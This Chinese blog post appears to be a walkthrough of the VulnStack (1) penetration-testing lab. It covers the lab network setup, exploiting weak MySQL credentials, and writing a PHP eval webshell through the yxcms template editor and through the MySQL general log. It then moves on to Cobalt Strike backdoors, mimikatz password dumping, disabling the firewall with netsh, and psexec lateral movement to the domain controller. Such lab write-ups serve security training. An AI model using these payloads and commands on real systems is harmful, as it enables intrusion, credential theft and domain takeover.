[内网渗透]——VulnStack (一)

最新推荐文章于 2024-04-26 21:57:54 发布
最新推荐文章于 2024-04-26 21:57:54 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 内网 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/124329382
版权

网络拓扑图

在这里插入图片描述

VMware 网络配置

虚拟网络名称网段DHCP
VMnet3192.168.72.0/24
VMnet4192.168.52.0/24

虚拟机网络配置

虚拟机网段虚拟机接口
Windows 7 x64192.168.72.0/24 192.168.52.0/24VMnet3,VMnet4
Win2K3 Metasploitable192.168.52.0/24VMnet4
Windows Server 2008 R2 x64192.168.52.0/24VMnet4
Kali(用于攻击的机器)192.168.72.0/24VMnet3

虚拟机配置

密码为hongrisec@2019可以改成hongrisec@2022

Windows7 X64

在这里插入图片描述
本地连接设置为72网段
在这里插入图片描述
本地连接4会自动匹配vmnet4,所以自动获取IP地址即可,DNS服务器地址必须为域控的ip否则无法链接域控
然后进入 C:\phpStudy,运行 phpStudy.exe
在这里插入图片描述

Win2K3 Metasploitable

ipconfig,52网段即可
在这里插入图片描述

Windows Server 2008 R2 x64

ipconfig,52网段即可

靶场练习

信息收集

namp 192.168.72.143 查看Windows7 X64开放端口,发现开放80和3306
在这里插入图片描述
直接访问80端口发现phpstudy探针
在这里插入图片描述
尝试mysql弱口令密码root、root,发现登录成功

写shell

直接访问phpmyadmin弱口令登录,查看是否有写入文件的权限

SHOW VARIABLES LIKE '%secure_file_priv%'

很明显null没有写入权限,只能用别的方式获取webshell了
在这里插入图片描述

方式一

查看数据库目录时发现newyxcms
在这里插入图片描述
访问yxcms成功进入cms界面,这里直接把账号密码写到了公告中
在这里插入图片描述
访问index.php?r=admin/index/login登录
在这里插入图片描述
在[全局设置->前台模板]中有很多php文件,随便找一个写入一句话木马
在这里插入图片描述
蚁剑链接
在这里插入图片描述

方式二

日志文件写shell

# 查看当前配置
SHOW VARIABLES LIKE 'general%';

# 更改日志文件位置
set global general_log = "ON";
select @@basedir              //查看路径
set global general_log_file='C:/phpStudy/MySQL/a.php';

# 日志中写shell
SELECT "<?php eval($_POST[a]); ?>"

蚁剑连接
在这里插入图片描述

内网横向

配置cs

kali执行:

./teamserver 192.168.72.132 admin

本地直接链接即可(这里后来改成了132图没改过来)
在这里插入图片描述

上传木马

先生成个木马文件,攻击—>生成后门—>Windows可执行程序,添加一个监听器生成即可
在这里插入图片描述
上传到目录中
在这里插入图片描述
运行木马 .\artifact.exe
在这里插入图片描述
cs中成功上线
在这里插入图片描述
mimikatz sekurlsa::logonpasswords,获取密码
在这里插入图片描述
net view 查看内网其他主机
PDC为域控
在这里插入图片描述
查看并关闭防火墙

# 查看防火墙状态
shell netsh firewall show state
# 关闭防火墙 
shell netsh advfirewall set allprofiles state off

提权

在这里插入图片描述
提权后发现多了一个SYSTEM权限
在这里插入图片描述
查看目标机器
在这里插入图片描述

横向移动

横向移动->psexec,监听器设置SMB的,回话选择SYSTEM权限回话
在这里插入图片描述
此时成功上线拿到域控
在这里插入图片描述
同理再通过域控拿到域成员机器
在这里插入图片描述

S1nJa
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATK&CK1红队评估实战靶场Vulnstack之第二篇web漏洞
千寻的博客
07-21 848
文章目录0x01 信息收集主机探测端口扫描目录浏览0x02 漏洞利用方式一phpmyadmin弱口令+全局日志getshhell第一步 扫描目录第二步 使用弱口令登录第三步 查询全局日志变量配置第四步开启全局日志并修改日志保存位置第五步 查询一句话写入日志第六步 连接方式二yxcms任意文件读写,getshell第一步目录扫描发现yxcm和备份文件第二步发现存在信息泄露,泄露口令为弱口令第三步 使用弱口令登录第四步直接在前台模板创建新的模板,内容为一句话木马第五步 根据之前下载的备份文件内容,查找出文件路径
我所了解的内网渗透——内网渗透知识大总结 作者:未知.pdf
04-08
我所了解的内网渗透——内网渗透知识大总结 作者:未知
Vulnstack(一)
iO快到碗里来
11-12 9530
0x00 Preface 网上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内网机器。 VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)网卡设置为:VMnet1(仅主机模式) VM2(Win2008)网卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
《MetaSploit渗透测试魔鬼训练营》之环境搭建
最新发布
2401_84572976的博客
04-26 887
顺序攻击前(网络踩点、网络扫描、网络查点)攻击中(利用漏洞信息进行渗透攻击、获取权限)攻击后(后渗透维持攻击、文件拷贝、木马植入、痕迹擦除)
Vulnstack(1)
ppbgi的博客
05-25 287
信息收集 进行ip的扫描以及开放端口的探测: 扫描到有80端口,进行访问: 尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令: 发现可以登录,进行目录后台的扫描: 发现有phpmyadmin目录,进行登录: 然后尝试写入一句话木马来获取shell: show variables like '%general%'; #查看日志状态 SET GLOBAL general_log='on' #开启general set global general
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 824
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
vulnstack(一)
qq_63928796的博客
03-17 727
三台机器在同一内网中,win7 web服务开放在外网,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
域渗透——PassTheHash&PassTheKey
02-26
标题为“UpdatetofixthePass-The-HashVulnerability”而在一周后却把标题改成了“Updatetoimprovecredentialsprotectionandmanagement”下面就结合这中间发生的事情更进一步的研究域渗透。在域渗透中,Hash和Key尤为...
agent内网渗透代理相关
04-14
内网渗透代理
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5334
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
渗透测试之Vulnstack1内网域渗透
LvHLong的博客
04-27 3306
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
Vulnstack 红队(一)
菜鸟的学习笔记
06-02 8141
Vulnstack 红队(一) 靶机为红日安全分享的靶机 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 笔记参考资料如下: CSDN——谢公子 FreeBuf——红日安全团队专栏 CSDN——assless 序 本次网络环境为两个虚拟网络。 192.168.72.0/24为模拟公网环境。(Vmnet2) 192.168.52.0/24为模拟内网环境。(Vmnet1) 攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网) win7的
【红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1229
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
vulnstack-Web安全入门进阶实战靶场配置
orange777
02-02 1618
Web安全入门进阶实战课程靶场为我们提供了很多web攻击靶场,免去了自己搭建过程中遇到的各种问题。但是在实际搭建过程中,发现配置上还有有点小问题,记录一下。 因为默认配置是127.0.0.1,也就是说只能在本地访问,其它主机想去访问则访问不到。有时候需要用到集成工具如果kali等其它辅助渗透的时候会不太方便,这里记录下修改配置记录。
Vulnstack1学习
ruyueattention
10-26 1116
文章目录前言一、环境搭建二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、环境搭建 一共三台机器,其中w7属于外网入口,w2003与windows server2008属于内网主机。因此为了实现环境需要为w7设置两张网卡,一张内网,一张外网。 w7 w2003 windows server
vulnstack1--红队靶机
niqiu320的博客
05-31 573
思路流程: 环境搭建(靶机环境) 一、前渗透的阶段 首先信息收集 getshell 尝试内网信息收集 二、后渗透阶段 (一)msf和cs联动 内网信息收集 三、攻击域(内网渗透) (一)提权 (二)横向移动 攻击域控 ...
01 ATT&CK红队评估
qq_52671379的博客
07-19 382
01 ATT&CK红队评估
内网穿透——frp应用
09-16
frp是一款功能强大的内网穿透软件,它可以使处于内网或防火墙后的设备对外界提供服务。通过frp,你可以在公网中访问你的私有设备,例如远程桌面、远程文件和SSH等。frp可以通过反向代理的方式来实现内网穿透,它支持...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值